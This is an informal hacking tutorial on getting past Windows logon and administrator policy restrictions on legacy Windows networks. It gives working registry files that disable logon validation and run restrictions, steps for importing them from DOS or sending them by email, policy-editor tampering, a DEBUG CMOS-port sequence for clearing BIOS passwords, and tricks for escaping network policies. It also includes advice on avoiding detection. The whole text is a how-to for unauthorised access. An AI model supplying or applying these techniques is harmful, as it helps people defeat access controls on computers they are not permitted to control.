|
by
Chris Zhang
Hack into Windows Network by Chris Zhang
I have read lots of articles embrace various methods of
hacking into windows networks. Except for NetBIOS attacks,
the majority of the others concern registry attacking. Not
to impugn these authors, their hacking tutorials reflected
very limited understanding of registry structure and how
exactly it works. They probably know perfectly how to use
the registry, but the knowledge behind it. Okay, get rid of
my guff.
Let’s start.
DOS ATTACK (local computers or equivalent to local
computers but in a network ONLY)
Say you have a situation:
NO user name and password are given
NO Bios password banner being active
A: or CD-ROM drive is present and functional
Basic principle: make your own registry file which
anti-disable the
functions that were disabled in your target computer, then
import it
to the system registry, restart the computer or refresh the
system.
Copy the red bit and save it as *.reg
Regedit 4
[HKEY_LOCAL_MACHINE\Network\logon]
"mustbevalidated"=dword:00000000
Boot up your computer to real Dos and copy the file to a
path like c:
Type: path c:\windows enter
Regedit *.reg enter
You will see something like ‘successfully’. Restart your
computer see what happens.
This file would let you enter windows without providing
your user name and password, but simply click on cancel or
press Esc.
GUI ATTACK (Network computers)
Again, say you have a situation:
Granted an account with limited privilege
Internet connection available and eligible to download
A: drive inaccessible, but physically present
NOT on Windows NT or 2000 network, administrator use other
programs restrict your access rights.
Basic principle: Write your own reg file and send it to
your email box then receive it on the target computer, run
the reg file without saving it(for your own safe, might get
caught if you do save).
Like dos attack, copy the red bit once again, save it as
*.reg, then double click on it to execute, also you can put
more stuff in it to enable more functions, example:
Regedit 4
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"norun"=dword:00000000
After running the file, you have to refresh your system,
you can log out and log back in, as long as you are not on
a Windows NT or 2000 network, the administrator use other
programs restrict your access rights. Or, you press
ctrl+alt+del, when a box pops up and ask you to confirm shut
down computer or restart, just press cancel, then wait few
seconds until another box comes up, click on end task. All
the functions which you have enabled will take affect
immediately.
On Windows NT or 2000 network, the administrator use
policies to restrict your access rights.
Make sure hidden and system files are shown. Go to windows
folder and search poledit.exe, double click on it. An error
message will pop out say can’t find pol file, no worries,
click ok, then cancel the next box. Go to option and click
on template, add. Go to system drive:
\windows\inf. Then you will see heaps adm file, choose
windows.adm and press ok. Then go to file, open registry.
What can you see? Change it around for your own pleasure,
mate.
If you wanna know the whole network configuration just
click on File and go the option below Exit.
DO REMEMBER to refresh your system. (Don’t log out and back
in, the other way)
If you want to get access to A: drive, first enable show
all drives in policy. If doesn’t work, enable dos prompt.
Use assembly language type:
Debug
-O 70 10
-O 71 0
Or make up any numbers which are different. (Cheat POST)
Method 2: unplug the network cable when being copying
policy from the server, then you got full access to the
computer, but out of the network, no worries. Go to windows
folder then inf folder, which is default hidden. Move the
*.adm files to other path, then log back in. cause the
system cant find any restriction configuration files,
apparently the restrictions are not going to take affect.
Enjoy
Credits
Chris Zhang
dotnet_impressive@hotmail.com |